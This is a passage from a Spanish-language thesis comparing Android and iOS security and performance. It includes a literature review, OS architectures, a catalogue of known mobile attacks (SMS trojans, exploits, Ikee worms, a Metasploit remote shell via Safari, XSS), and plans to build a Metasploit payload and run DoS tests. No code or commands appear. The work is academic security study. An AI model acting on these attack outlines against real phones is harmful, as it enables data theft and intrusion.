Elaboración: (Morelo & Betancur, 2013, p. 6)
Fuente: (Morelo & Betancur, 2013, p. 6)
El grafico N°1, detalla a Android como el sistema líder para el cual se crean
malware (código malicioso, cuyo objetivo es dañar un sistema) con un 98.96%,
seguido por J2ME con un 0.97%, en tercer lugar, está Symbian con un 0.04% y
los demás con un 0.03%.
Por otro lado, (Durán, Peinado, & Rosado, 2015), denota las molestias que causa
a los usuarios en cuanto al rendimiento de las aplicaciones que presentan sus
teléfonos; el resultado del 96% de usuarios destaca qué tan importante es para
ellos el desempeño en los dispositivos.
Mediante un estudio realizado por Apigee (2012), se obtuvo que el 96% de los
usuarios manifestaban frustración cuando encuentran problemas como:
aplicaciones congeladas, capacidad de respuesta lenta, excesivo uso de batería
y cantidad exagerada de publicidad (Durán et al., 2015, p. 85).
Las personas y empresas poseen dispositivos móviles de bajo rendimiento
cotidianamente por falta del conocimiento en el uso correcto de la plataforma y por
GRÁFICO N° 1
ESTADÍSTICA DE CREACIÓN DE MALWARE PARA SISTEMAS
8
CUADRO N° 1
CAUSAS, CONSECUENCIAS DEL PROBLEMA
escuchar hipótesis de sus amigos, familiares e incluso por el marketing de las
marcas que venden teléfonos móviles.
Una de las consecuencias es adquirir un teléfono móvil que no alcance el
rendimiento ofrecido por el modelo elegido; desde otro punto de vista no se
explotaría al máximo la eficiencia del sistema operativo que posee el dispositivo,
aunque sea con una capacidad elevada.
Causas, consecuencias del problema
Elaboración: Ruth Asqui
Fuente: Ruth Asqui
Falta de conocimiento de medidas de
seguridad que ofrece el sistema
operativo.
Víctima de cualquier ataque de la
informacion.
Adquirir un teléfono de gama baja.
Los sistemas operativos móviles no
alcanzan a cubrir todos los pilares de la
seguridad.
No prestar la debida atención a los
accesos de recursos de las
aplicaciones que ofrecen los
dispositivos móviles en la tienda.
Escuchar a personas de criterios
hipotéticos.
Daño Moral, por el robo de
información personal, por personas
mal intencionadas.
Perder la disponibilidad e integridad
de los datos almacenados en el
teléfono.
No utilizar correctamente la plataforma
que ofrece el teléfono inteligente.
No aprovechar al máximo la
tecnología móvil.
Acceder a páginas web inseguras.Pérdida de dinero de empresas y
personas.
Causas Consecuencias
9
Delimitación del problema
Elaboración: Ruth Asqui
Fuente: Ruth Asqui
Formulación del Problema
¿Mediante el análisis comparativo de seguridad de la información y rendimiento
de los sistemas operativos Android e iOS, se podrá brindar al usuario una guía de
recomendaciones que le permitan seleccionar entre las dos plataformas y
establecer los beneficios de éstas?
Evaluación del problema.
Para la evaluación del problema se plantean seis aspectos tales como: Delimitado,
Claro, Evidente, Concreto, Relevante y Factible. Los cuales se ajustan al problema
de la investigación de este proyecto a continuación se justifica cada uno de ellos:
Delimitación: Las personas y empresas debido a la popularidad de los teléfonos
inteligentes se ven afectadas en la seguridad de la información; los
ciberdelincuentes buscan aprovechar las vulnerabilidades de Android e iOS para
apoderarse de información que les interese y sacar provecho más que todo en lo
Campo
Área Seguridad en Tecnología Móvil.
Dispositivos Móviles
Establecer los beneficios que ofrecen los sistemas
operativos: Android e iOS, en teléfonos móviles, mediante el
análisis comparativo de seguridad de la información y
rendimiento para brindar al usuario una guía de
recomendaciones.
Análisis comparativo en términos de seguridad de la
información y rendimiento entre sistemas operativos Android
e iOS en teléfonos móviles.
Aspecto
Tema
CUADRO N° 2
DELIMITACIÓN DEL PROBLEMA
10
económico e incluso en espionaje de información personal, tentando contra la
moral del usuario.
Las nuevas versiones de teléfonos móviles tanto de Android como iOS va
aumentando en un tiempo acelerado, se implementan nuevas características
incluso muy similares a las anteriores que logran enganchar a los usuarios. Estos
alcances que logra la tecnología ocurren porque en muchas ocasiones los
usuarios no tienen el conocimiento necesario para diferenciar el rendimiento que
van a brindar los sistemas operativos en el momento de adquirir un teléfono móvil.
Claro: Debido al avance tecnológico de los dispositivos móviles de Android e iOS,
la seguridad de la información y rendimiento se ven afectados, ya sea por ataques
informáticos a vulnerabilidades que no han cubierto por completo tanto Google
como Apple y por la falta de conocimiento del correcto uso de las plataforma tanto
en las configuraciones de seguridad como en el verdadero desempeño de las
nuevas versiones de teléfonos móviles. Cabe mencionar que se corren estos
riesgos, ya que conforme la tecnología avanza los ciberdelincuentes buscan la
manera de hacer caer tanto a Android como a iOS en la seguridad que brindan los
dispositivos.
Evidente: Es innegable decir que en la actualidad los sistemas operativos Android
e IOS son los que lideran el mercado de los dispositivos móviles, ya que las
personas desde los niños hasta ancianos poseen un teléfono móvil; por lo que los
ciberdelincuentes han aprovechado este mercado para robar dinero accediendo a
la información; en cuanto al rendimiento obtenemos un teléfono que no
explotamos al máximo sus recursos.
Es claro que los ciberdelincuentes están siempre realizando ataques para
encontrar las vulnerabilidades a las nuevas versiones de teléfonos móviles tanto
Android como iOS porque la tecnología cada día va en aumento; en rendimiento
los usuarios también van a estar adquiriendo nuevos teléfonos móviles por las
características que ofrecen las marcas o por recomendaciones de personas.
Concreto: Los usuarios en cualquier parte del mundo están en riesgo de algún
ataque informático por los agujeros existentes en la seguridad de la información
11
en los sistemas operativos Android e iOS; y por falta de conocimiento del uso
correcto de la plataforma pueden adquirir un teléfono de gama baja y no
aprovechar al máximo el rendimiento que brindan los dispositivos móviles.
Relevante: La seguridad de la información de los sistemas operativos más
grandes del mercado de teléfonos móviles no pueden cubrir todos los pilares
fundamentales de la seguridad de la información en la actualidad, ya que mientras
van desapareciendo vulnerabilidades de los sistemas operativos van apareciendo
más de éstas e incluso nuevas, conforme va aumentando esta tecnología; en
cuanto al rendimiento siguen siendo notorias las fallas por el mal uso del teléfono
por parte de los usuarios ya que no tienen una guía de recomendaciones referente
a este tema.
Factible: Es posible reducir el problema de seguridad de la información, pero no
resolverlo debido a que mientras avanza la tecnología también lo harán los
ciberdelincuentes en contra de la seguridad de los teléfonos móviles. Aprovechar
el rendimiento de los teléfonos móviles no es posible, ya que actualmente no
existen guías que brinden los beneficios de los sistemas operativos ya sea de
Android e iOS.
OBJETIVOS DE LA INVESTIGACIÓN
Objetivo general
Establecer los beneficios y limitaciones que ofrecen los sistemas operativos:
Android e iOS, en teléfonos móviles, mediante el análisis comparativo de
seguridad de la información y rendimiento para brindar al usuario una guía de
recomendaciones que le permita seleccionar entre las dos plataformas.
Objetivos específicos
✓ Analizar, las ventajas y desventajas de cada sistema operativo mediante
herramientas de seguridad informática.
12
✓ Comparar el rendimiento de los sistemas operativos Android e iOS, en
varias versiones de teléfonos móviles, desde cierta aplicación en común
para las dos plataformas.
✓ Plantear al usuario una guía, de los resultados obtenidos en el estudio
comparativo mediante el análisis cualitativo.
ALCANCES DEL PROBLEMA
En el proyecto se analizarán los dos sistemas operativos Android e iOS, en seis
teléfonos inteligentes.
✓ Se tomarán dos teléfonos móviles con características comunes uno de
cada plataforma en que se realizarán ataques en la seguridad de la
información.
✓ Se tomarán seis teléfonos, tres de cada sistema operativo, donde se
medirá el tiempo de ejecución que demore la aplicación que analiza el
rendimiento; para determinar las diferencias de los sistemas operativos
móviles en el término a estudiar.
✓ Se establecerán los beneficios y limitaciones que ofrece cada sistema
operativo de los dos términos a estudiar, para que los usuarios tengan una
guía de recomendaciones y puedan seleccionar la plataforma correcta al
momento de adquirir un teléfono móvil.
JUSTIFICACIÓN E IMPORTANCIA
(Rodríguez & Quimí, 2016) “Los dispositivos móviles seguirán creciendo, junto a
sus características, capacidades y posibilidades de utilización, lo que hace
necesario evaluar la seguridad que se ofrecen a estos dispositivos.”
13
El estudio de análisis comparativo en los sistemas operativos Android e IOS, se
realiza porque los usuarios dicen es mejor usar tal dispositivo, sin saber la
verdadera razón de por qué utilizan ese teléfono.
Una de las razones más importantes de realizar el análisis comparativo, es para
determinar qué sistema operativo brinda mayor seguridad de la información y
mejor rendimiento de las diversas versiones de teléfonos móviles.
Es importante porque se rompería la interrogante de qué sistema operativo es
mejor y daríamos a conocer los beneficios de cada uno de éstos; facilitando la
elección de la plataforma de cada teléfono móvil que utilice el usuario.
Metodología del proyecto
Se utilizará la metodología de análisis cualitativo y cuantitativo para conocer y
medir el grado de exposición de seguridad de la información y rendimiento en
Android e iOS de teléfonos móviles.
Se analizarán los términos de seguridad de la información y rendimiento de cada
sistema operativo, para elaborar una guía como recomendación, que ayude a los
usuarios a la toma de decisiones en el momento de adquirir un teléfono móvil.
14
CAPITULO II
MARCO TEÓRICO
ANTECEDENTES DEL ESTUDIO
“Tecnología y desarrollo en dispositivos móviles -
seguridad en dispositivos móviles.”
Material docente de la UOC elaborado por Josep Prieto Blázquez, Robert Ramírez
Vlque, Julian David Morillo Pozo y Marc Domingo Prieto docentes de la
Universidad Oberta de Catalunya en España, finalizado el año 2011.
La elaboración de este módulo tiene como fin no ser un manual de seguridad ni
recoger todos los riesgos que existen, sino para introducir conceptos básicos de
seguridad y que familiarice a usuarios con los riesgos expuestos; debido al avance
de la tecnología inalámbrica en dispositivos móviles.
Fuente: Google Scholar (Prieto et al., 2011)
“Sistemas operativos móviles: funcionalidad, efectividad y
aplicaciones útiles en Colombia”
Proyecto de grado elaborado por Sanly Aponte Gómez y Carlos Dávila Ramírez
estudiantes de la Universidad EAN – Facultad de Ingeniería en Sistemas en
Bogotá, en el año 2011.
La elaboración de este proyecto de grado tiene como objetivo analizar los sistemas
operativos móviles más utilizados en la actualidad, sus funcionalidades,
efectividad para poner en práctica lo aprendido referente al tema, para que los
usuarios puedan tener el conocimiento necesario para aprovechar al máximo la
plataforma y aprovechar la seguridad que brinda el teléfono móvil. (Aponte &
Dávila, 2011)
15
Fuente: Repositorio de la universidad EAN – Biblioteca Hildebrando Perico
Afanador (Aponte & Dávila, 2011)
“Características y parámetros de la seguridad para los
smartphones con sistema operativo Android”
Proyecto de grado elaborado por Rubén Darío Osorio Herrada y Carlos Alberto
Ramirez Herrera estudiantes de la Universidad Tecnológica de Pereira – Facultad
de ingenierías - Programa de ingeniería en sistemas computacionales, en el año
2011
La elaboración de este proyecto tiene como objetivo desarrollar una monografía
que considere las principales características y parámetros de la seguridad en
transmisión de datos para los Smartphones con sistema operativo Android; con el
fin de brindar conocimiento a los usuarios de las crecientes amenazas de malware
que puede ocurrir en los dispositivos móviles y recomienda aplicaciones que
brinden seguridad en su plataforma. (Osorio & Ramírez, 2011)
Fuente: Repositorio de la Universidad Tecnológica de Pereira (Osorio & Ramírez,
2011)
“Seguridad en dispositivos móviles con sistemas
operativos Android y iOS”
Artículo investigativo elaborado por Juan Carlos Albarracín Galindo, Leidy Maribel
Parra Camargo y Juan José Camargo Vera, estudiantes de la Universidad
Pedagógica y Tecnológica de Colombia – Escuela de Ingeniería en Sistema
Computacionales; en la ciudad de Tunja – Colombia, en el año 2013
Este artículo presenta una perspectiva de análisis de los aspectos relevantes
relacionados con la seguridad en los dispositivos móviles con sistemas operativos
Android y IOS. Fue elaborado para determinar los mecanismos de seguridad que
se pueden implementar por el usuario, con el fin de minimizar los posibles riesgos
16
presentes en el momento de uso de los dispositivos móviles. (Albarracín et al.,
2013, p. 51)
En el artículo mencionan un estudio donde nos confirman que existen resultados
donde indican que iOS es el sistema operativo de mayor cantidad de
vulnerabilidades frente a Android en los teléfonos móviles.
La empresa de seguridad en su informe Internet Security Threat Report 2013,
menciona respecto a las vulnerabilidades de seguridad en los teléfonos móviles
durante el año 2012; que el sistema operativo iOS tiene mayor número de
vulnerabilidades que Android en ese año. (Albarracín et al., 2013, p. 51)
Con el estudio realizado, la utilización de smathphone con fines de negocio
incrementa de forma acelerada día a día, debido a la información almacenada,
surge la motivación de los ciberdelincuentes para realizar ataques informáticos y
obtener información de los usuarios. Por eso da a conocer a los usuarios los
peligros y riesgos que están expuestos en los dispositivos. También recomienda
a los usuarios de Colombia acoger las medidas necesarias cuando realicen
actividades cotidianas para aprovechar al máximo las facilidades que ofrecen sin
poner en riesgo la información. Y concluye que Android es el sistema operativo
con mayor incidencia de ataques informáticos, por tal motivo aconseja a estos
usuarios prestar atención a los mecanismos existentes de seguridad, verificar los
permisos de las aplicaciones que se instala; para prevenir ataques Troyanos SMS
y utilizar anti-virus.
Fuente: Repositorio Los Libertadores (Albarracín et al., 2013)
“Metodología para la selección de herramientas eficientes
y protocolos adecuados para mejorar la seguridad de los
dispositivos móviles”
Proyecto de magister elaborado por Ing. Daysi Mireya Erreyes Pinzón, estudiante
de la Universidad de Cuenca – Facultad de Ingeniería – Maestría en Gestión
17
Estratégica de Tecnologías de la Información; en la ciudad de Cuenca – Ecuador
en el año 2017.
El desarrollo de la investigación tiene como objetivo, diseñar una metodología para
la selección de herramientas eficientes y protocolos adecuados para mejorar la
seguridad de los dispositivos móviles. La que permitirá a los usuarios y
profesionales dedicados a la protección de información, disponer de una guía
práctica que les permita seleccionar herramientas válidas y puedan mejorar su
nivel de protección de la información contenida en sus dispositivos móviles.
(Erreyes, 2017)
Fuente: (Erreyes, 2017)
FUNDAMENTACIÓN TEÓRICA
Sistema operativo
Definiciones
(Aponte & Dávila, 2011), afirma que “Un sistema operativo (SO) es el software
básico de una computadora que provee una interfaz entre el resto de los
programas del computador, los dispositivos hardware y el usuario.” (p. 20)
El sistema operativo es el componente encargado de gestionar los recursos del
ordenador, así como los programas instalados en este. De esta forma nos permite
utilizar el software de una manera cómoda y gestionar más adecuadamente los
recursos del hardware. (Correa, 2014, p. 27)
Se confirma que, un sistema operativo móvil, es un sistema encargado de
monitorizar un dispositivo móvil de la misma manera de los sistemas operativos
de un pc de escritorio, laptop, etc. Los sistemas operativos móviles son sencillos
en comparación a las computadoras porque están dirigidos comúnmente a la
18
conectividad inalámbrica, la configuración multimedia y la forma de alojar
información en ellos. (Aponte & Dávila, 2011)
Tipos de sistemas operativos móviles
Los tipos de sistemas operativos móviles según (Correa, 2014) son: Symbian,
Blackberry OS, Windows Mobile, Android e IOS.
Se escribe una definición breve de éstos, pero nos centraremos en Android e iOS
porque son los que vamos a estudiar en el análisis ya que estos están en la
actualidad liderando el mercado de dispositivos móviles.
Symbian
Es un SO exclusivo para celulares, creado por una alianza entre varias empresas
de telefonía celular en las que se encuentra: Nokia, Sony Ericsson, Panasonic,
Motorola, PSION, LG, Samsung, Siemens, Arima, Beng, Sharp, Fujitsu, Lenovo,
Mitsubishi Electric, entre otros. Está basado en su predecesor el sistema EPOC3,
el cual fue utilizado en Handhelds y PDA’s. (Correa, 2014, p. 34)
BlackBerry Os
Es un sistema operativo móvil creado por Reseach In Motion (RIM) para sus
dispositivos BlackBerry. Es un sistema que permite multitarea y tolera diferentes
métodos de entrada adoptados por RIM para su uso en computadora de mano,
como son trackball (bola de desplazamiento). (Bermúdez & López, 2011, p. 30)
Windows Mobile
Es un sistema operativo móvil desarrollado por Microsoft, y diseñado para su uso
en smartphone y otros dispositivos móviles. Es basado en el núcleo del sistema
operativo Windows CE y cuenta con un conjunto de aplicaciones básicas
19
utilizando las API de Microsoft Windows. Su diseño es similar a las versiones de
escritorio de Windows estéticamente. (Correa, 2014, p. 39)
Android
Es una plataforma completa de código abierto diseñado para dispositivos móviles.
Es promovido por Google y pertenece a Open Handset Alliance. El objetivo de
alianza es “acelerar la innovación en los consumidores móviles y ofrecen una rica,
menos costosa, y mejor experiencia móvil”. Como tal Android está revolucionando
el espacio móvil. Por primera vez es una verdadera plataforma abierta que separa
del hardware del software que se ejecutan en él. (Carvajal & Sasig, 2012, p. 45)
Para el estudio de este proyecto se utilizará tres teléfonos móviles inteligentes con
sistemas operativos Android, de versión 5.1.1, versión 6.0.1 y versión 7.0
Características
Según (Albarracín et al., 2013) las características relevantes de Android son:
✓ El frameword de aplicaciones que permite el reemplazo y la reutilización
de los componentes.
✓ El navegador integrado el cual está basado en el motor de open Source
Webkit; SQLite base de datos para almacenamiento estructurado que se
integra directamente con las aplicaciones.
✓ El soporte para medios con formatos comunes de audio, video e imágenes
planas; máquina virtual Dalvik entre otras. (p. 46)
20
Arquitectura de Android
Elaboración: (Correa, 2014)
Fuente: (Correa, 2014)
APLICACIONES
“Las cuales se incluye como base un cliente email, programa de SMS,
calendario, mapas, navegador, contactos y otros. Todas escritas en lenguaje de
programación Java.“ (Albarracín et al., 2013, p. 46)
FRAMEWORK DE APLICACIONES
“Los desarrolladores de Android, tienen acceso al código fuente usando en
aquellas que son base, esto para que no se generen más componentes distintos
GRÁFICO N° 2
ARQUITECTURA DE ANDROID
21
que respondan a la misma acción (reutilización de componentes.)“ (Albarracín
et al., 2013, p. 46)
LIBRERÍAS
Android incluye en su base de datos un set de librerías C/C++, que son
representadas a todos los desarrolladores a través del frameword de las
aplicaciones. Algunas son System C Library, bibliotecas de medios, bibliotecas de
gráficos, 3D y SQLite, entre otras. (Albarracín et al., 2013, p. 46)
RUNTIME DE ANDROID
Incorpora un set de librerías que aportan la mayor parte de las funcionalidades
disponibles en las librerías base del lenguaje de programación Java. Cada
aplicación Android corre su propio proceso con su propia instancia de la máquina
virtual Dalvik. Dalvik ejecuta archivos en el formato Dalvik Ejecutable (.dex), el cual
está optimizado para memoria mínima. (Albarracín et al., 2013, p. 46)
NÚCLEO LINUX
Android depende de Linux para los servicios base del sistema como seguridad,
gestión de memoria, gestión de proceso, pila de red y modelo de controladores.
Este además actúa como una capa de abstracción entre el hardware y el resto de
la pila de software. (Albarracín et al., 2013, p. 46)
iOS
Es un sistema operativo de código cerrado, orientado a equipos de escritorio que
ha sido reinventado para dispositivos móviles. Ya que está basado en el sistema
operativo informático más avanzado del mundo, OS X iOS representa un rápido
desempeño y una estabilidad muy sólida. (Correa, 2014, p. 43)
Desarrollado por Apple Inc, inicialmente solo para el teléfono inteligente de la
compañía (iPhone), luego fue extendido a otros dispositivos como el iPod Touch,
iPad y el Apple TV. Se deriva de Mac OS X, el cual está basado en Darwin BSD.
(Albarracín et al., 2013, p. 47)
22
Para el desarrollo de este proyecto, se utilizará tres teléfonos inteligentes con
sistema operativo iOS de versión 10.3.3, versión 11.0.2 y versión 11.1.2
Características.
Las principales características según (Albarracín et al., 2013) son:
INTERFAZ DE USUARIO
Se basa en el concepto de manipulación mediante gestos multi-touch. Los
elementos de esta se componen por deslizadores, interruptores y botones. La
respuesta es inmediata y fluida en las aplicaciones. La interacción con el sistema
operativo se realiza mediante movimientos como deslizar y tocar. (Albarracín
et al., 2013, p. 47)
SPRINGBOARD
Es la pantalla principal donde se ubican los iconos de Aplicaciones y el Dock en
la parte inferior de la pantalla se puede anclar aplicaciones de uso frecuente.
(Albarracín et al., 2013, p. 47)
APLICACIONES
iOS incluye múltiples aplicaciones entre las que se destacan : phone (video
conferencia y teléfono), email, safari (navegador web), mensajes, calendarios,
fotos, cámara, iTunes, App Store (Tienda de aplicaciones), Nike + iPod, Siri
(asistente por control de voz), entre otras.(Albarracín et al., 2013, p. 47)
SOPORTE MULTITAREA
El sistema operativo permite la ejecución de aplicaciones en segundo plano,
permitiendo la posibilidad de usar varias a la vez (Albarracín et al., 2013, p. 47)
23
GRÁFICO N° 3
ARQUITECTURA DE IOS
Arquitectura de iOS
“iOS cuenta con cuatro capas de abstracción: el núcleo del sistema operativo, los
“Servicios Principales”, los “Medios” y “Cocoa Touch”. “(Albarracín et al., 2013, p.
47)
Se basa en capas, en donde las más altas se encargan de contener las
tecnologías y servicios de mayor importancia para el desarrollo de las
aplicaciones; los servicios básicos son controlados por las más bajas. (Albarracín
et al., 2013, p. 48)
Elaboración: (Blanco, Camarero, Fumero, Werterski, & Rodríguez, 2009, p. 26)
Fuente: (Blanco et al., 2009, p. 26)
COCOA TOUCH
Es la capa de mayor relevancia en el desarrollo de aplicaciones para este sistema
operativo, basándose en un conjunto de Frameworks proporcionados por el API
de Cocoa; en donde se destacan: Ulkit encargado de contener todas las clases
24
que son necesarias para el desarrollo de una interfaz de usuario y Foundation que
definen algunos servicios del sistema operativo. (Albarracín et al., 2013, p. 48)
MEDIA
“Se proveen los servicios gráficos y multimedia. ”(Albarracín et al., 2013, p. 48)
CORE SERVICES
“Domina los servicios fundamentales necesarios para la ejecución de las
aplicaciones.” (Albarracín et al., 2013, p. 48)
CORE OS
“Constituye las características de bajo nivel, como lo son: drivers, manejo de
memoria, seguridad ficheros del sistema.” (Albarracín et al., 2013, p. 48)
Conceptos básicos de seguridad
Se necesita conocer conceptos básicos de seguridad porque el tema está
enfocado en este término importante que brinda los teléfonos móviles.
Según (Prieto et al., 2011) define los conceptos a continuación:
Confidencialidad
Es la propiedad que asegura que solo los que están automatizados tendrán
acceso a la información. Esta propiedad también se conoce como privacidad.
(Prieto et al., 2011, p. 7)
Integridad
Es la propiedad que asegura la no alteración de la información. Por alteración
entendemos cualquier acción de inserción, borrado o sustituido de la información.
(Prieto et al., 2011, p. 7)
25
Disponibilidad
Es la confirmación que todos los usuarios autorizados tengan acceso a la
información y activos relacionados cuando se requiera.(Salellas, 2017)
Autentificación
Es la propiedad que hace referencia a la identificación. Es el nexo de unión entre
la información y su emisor. (Prieto et al., 2011, p. 7)
El no repudio
Es la propiedad que asegura que ninguna parte pueda negar ningún compromiso
o acción realizados anteriormente. (Prieto et al., 2011, p. 7)
Dispositivo móvil.
Un dispositivo móvil, es todo aquel aparato que puede contener información, tenga
un sistema operativo y haga la función en particular en la que se necesita
almacenar, consultar y manipular información que se encuentre en él y que
además sea portable y de un tamaño muy reducido.(Correa, 2014, p. 23)
Tipos de dispositivos móviles.
Teléfono móvil.
(Baz, Ferreira, Álvarez, & García, 2011) afirmó que “El teléfono móvil es un
dispositivo inalámbrico electrónico basado en la tecnología de ondas de radio,
que tiene la misma funcionalidad que cualquier teléfono de línea.”
26
Asistente Digital Personal.
Según (Albarracín et al., 2013, p. 48), “son agendas personales electrónicas que
se caracterizan por su capacidad para el almacenamiento de datos, lo anterior
debido a que poseen la cantidad de memoria necesaria para esta función.”
Teléfono móvil inteligente (SmartPhone)
Este tipo de dispositivos se presentan actualmente como los más ligeros,
portables y cómodos, la principal función que cumplen es la de realizar y recibir
llamadas; adicionalmente los “Smartphone” se hacen cada vez más atractivos
para los usuarios, debido a que permiten la instalación y ejecución de aplicaciones,
de gran utilidad para los compradores, entre las más relevantes se pueden
encontrar cámara fotográfica, grabación de video, gestor de correos electrónicos,
chats, redes sociales, GPS, navegador web entre otros. (Albarracín et al., 2013,
p. 49)
Para el estudio de este proyecto, se utilizarán seis teléfonos móviles inteligentes,
el Samsung Galaxy J5, Samsung Galaxy J7, Samsung Galaxy 8 Plus, iPhone 5,
iPhone 6 y iPhone 7.
Capas de seguridad en dispositivos móviles
✓ Hardware potente, con muchos sensores.
✓ Un sistema operativo complejo que facilita un SDK sencillo y potente para
los desarrolladores.
✓ Un mercado de aplicaciones completamente integrado en el sistema y muy
intuitivo, lo que facilita las transacciones tanto a los usuarios como a los
desarrolladores.(Prieto et al., 2011, p. 8)
Ataques
(Erreyes, 2017) define al ataque como un acto deliberado que se produce cuando
se intenta provocar un daño en un sistema específico; cualquier tipo de ataque
constituye una amenaza a la seguridad informática, sin dejar a un lado los casos
27
en los que el daño se produce de forma accidental por ejemplo los fallos en el
hardware, costes en la energía eléctrica, tormentas eléctricas, incendios y otros
desastres naturales. (p. 19)
Hay diversos tipos de ataques informáticos según (Erreyes, 2017) entre los más
importantes:
Ataques Pasivos que se producen por: ataque de intermediario (man in the
middle); Ataques Activos, ocasionados por: eliminación, modificación suplantación
Interceptación; Ataques combinado (hacker, cracker, ciberdelito), virus, worms,
troyanos, spyware, malware, rootkis. (Erreyes, 2017, p. 19)
Ataques y amenazas en Android e iOS
Según (Prieto et al., 2011) las principales amenazas que existen en el ámbito del
sistema operativo son causadas por errores en el aislamiento de los recursos ya
sea debido a sus diseños, a errores en el software o a una mala configuración de
sus servicios.
Ejemplo del ataque:
En ciertas circunstancias, un proceso podría modificar los parámetros ya
verificados por otro proceso, pero que este todavía no ha utilizado. Las
consecuencias de tal ataque son imprevisibles, ya que el proceso realizará
operaciones utilizando parámetros para los que no ha sido diseñado.(Prieto
et al., 2011, p. 19)
Estas vulnerabilidades pueden ser aprovechadas para ejecutar ataques tantos
desde los servicios que ofrece el propio sistema operativo, como desde la capa
de aplicaciones.(Prieto et al., 2011, p. 19)
Si el ataque se realiza sobre un servicio del sistema operativo, sus consecuencias
dependerán de la vulnerabilidad expuesta. (Prieto et al., 2011, p. 19)
28
Principales Ataques contra Android
Troyanos SMS
(SMS - AndroidOS.Optake.bo,
SMS - AndroidOS.Fakelnst.a,
SMS - AndroidOS.Agent.a,
SMS - AndroidOS.Plangton.a,
SMS - AndroidOS.Opfake.a y
SMS - AndroidOS.Fakeview)
Generalmente funcionan de la siguiente forma: como primera medida el usuario
descarga el malware inadvertidamente, posteriormente el Troyano envía un SMS
a un numero de Premiun, sin el consentimiento de la víctima, el SMS es
transportado a través de la red de la compañía de telefonía prestada de la
plataforma SMS, en donde el código malicioso bloquea los mensajes de
confirmación para finalmente que el cibercriminal genere ganancias ilícitas
mediante el aprovechamiento de la cuenta del usuario. (Albarracín et al., 2013, pp.
50-51)
Adware
Su ejecución es automática y tiene como objetivo fundamental el mostrar
publicidad. Se ocultan en programas ofrecidos gratuitamente que incluyen dentro
de sus condiciones de uso, que generalmente no son leídas por el usuario, en
donde se acepta que se ejecuten las funciones que muestra dicha publicidad.
(Albarracín et al., 2013, p. 51)
29
Exploits
Son programas que se han diseñado para sacar provecho de las vulnerabilidades
de un software, representados por:
(Exploit-AndroidOS.Lotoor.g,
Exploit-AndroidOS.Lotoor.c y
Exploit-AndroidOS.Lotoor.p) de los ataques a estas plataformas; en la mayoría de
ocasiones estos ataques se realizan con fines maliciosos. Estas vulnerabilidades
no son más que errores en la programación, que pueden ser aprovechados como
puerta de entrada de ataques. (Albarracín et al., 2013, p. 51)
En este proyecto se realizará ataques Exploit, para vulnerar la confidencialidad
desde un computador con la herramienta metasploit.
En este proyecto se realizará en Android un ataque exploit, mediante metasploit
se creará un virus que adquiera los permisos, para acceder a contactos, mensajes,
imágenes y cámara web,
Ataques en iOS.
Según (Albarracín et al., 2013) los ataque más conocidos que se realizan en iOS
son:
Iphone Exploit Code
Básicamente el ataque consiste en colocar el computador del ataque a través del
metasploit como un webserver a la escucha de solicitudes de conexión
proveniente de los móviles navegando por internet. Cuando la víctima acceda al
webserver, el navegador Safari se cerrará automáticamente, el usuario, podrá
abrirlo nuevamente y continuar utilizando, sin embargo en el equipo del atacante
se tendrá un Shell remoto con permisos privilegiados sobre el sistema pudiendo
acceder a los correos configurados en el equipo, a los archivos de sistema a fin
de modificar los archivos host o dns. (Albarracín et al., 2013, p. 52)
30
Ikee.Co: Malware.iPhoneOS/Ikee,C@SSH+Otros
Gusano que afecta a móviles iPhone que utilicen la contraseña por defecto del
root en el servicio SSH del teléfono, únicamente afecta a terminales a los que se
le ha practicado el “jail-break”. Cambia la imagen de fondo del terminal. Cuando
se ejecuta, detiene remotamente el demonio SSH y elimina el inicio automático en
la opción de reinicio el servicio SSH. (Albarracín et al., 2013, p. 52)
Ikee.Bo: Malware.iPhoneOS/Ikee.B@SSH+Otros
Gusano que se propaga al dispositivo iPhone que han sido modificados, para
permitir la instalación de software oficial. Consiste en el robo información sensible,
bloquea la pantalla y muestra el siguiente texto.” El iPhone ha sido hackeado
porque es realmente inseguro”, y solicita el pago de 5 euros para la liberación del
dispositivo y, además modifica la contraseña del usuario root. (Albarracín et al.,
2013, p. 52)
Aurora Feint
Este fue un juego lanzado para la plataforma, su manera de atacar era subiendo
los datos de los contactos almacenados en la librería de directorios a la base de
datos del desarrollador y ocupa estos datos para enviar spam. (Albarracín et al.,
2013, p. 52)
Ataques D.O.S. y de Apam en iOS iMessages app
Estos ataques consisten en la denegación de servicios haciendo imposible abrir
la aplicación iMessages para leer los mensajes y dejando inutilizado el servicio.
(Albarracín et al., 2013, p. 52)
En este proyecto en el capítulo 3, se realizará ataques D.O.S, y se denegará el
servicio a páginas web que la víctima acceda.
31
Phishing
Este ataque tiene como objetivo intentar obtener sus datos, claves cuentas
bancarias, números de tarjeta de crédito, identidades para luego ser usados de
forma fraudulenta; puede producirse de varias formas, desde un mensaje, una
ventana emergente, y la más usada y reconocida por los internautas, la recepción
de un correo electrónico. (Albarracín et al., 2013, p. 52)
Cross-site scripting (XSS)
Es una vulnerabilidad que aprovecha la falta de mecanismo de filtrado en los
campos de entrada y permiten el ingreso y envío de datos sin validación alguna,
aceptando el envío de scripts completo. (Albarracín et al., 2013, p. 53)
URL spoofing
Este tipo de ataque consiste en mostrar una dirección URL falsa en la barra de
direcciones de Safari el navegador por defecto de iOS, permitiendo incluso tomar
información de la tarjeta de crédito cuando se realizan compras en la tienda de
Apple. (Albarracín et al., 2013, p. 53)
FUNDAMENTACIÓN LEGAL
El proyecto de investigación está protegido por el COIP (Código Orgánico Integral
Penal) de la ley en la República del Ecuador.
Las sanciones se encuentran en los siguientes artículos ubicados en el:
32
Capítulo tercero “Delitos contra los Derechos del Buen
Vivir”
Sección tercera “Delitos contra la seguridad de los activos
de los sistemas de información y comunicación”
Artículo 229.- Revelación ilegal de base de datos.- Las personas que, en
provecho propio o de un tercero, revele información registrada, contenida en
ficheros, archivos, bases de datos o medios semejantes, a través o dirigidas a
un sistema electrónico, informático, telemático o de telecomunicaciones;
materializando voluntaria e intencionalmente la violación del secreto, la
intimidad y la privacidad de las personas, será sancionada con pena privada de
uno a tres años.(Asamblea Nacional Registro Oficial, 2014, p. 36)
Articulo 230.- Interceptación ilegal de datos.- Será sancionada con pena
privativa de libertad de tres a cinco años:
1. La persona que diseñe, desarrolle, venda, ejecute, programe o envíe
mensajes, certificados de seguridad o páginas electrónicas, enlaces o
ventanas emergentes o modifique el sistema de resolución de nombres de
dominios de un servicio financiero o pago electrónico u otro sitio personal o
de confianza, de tal manera que induzca a una persona a ingresar a una
dirección o sitio de internet diferente a la que quiere acceder. (Asamblea
Nacional Registro Oficial, 2014, p. 36)
2. La persona que a través de cualquier medio copie, clone o comercialice
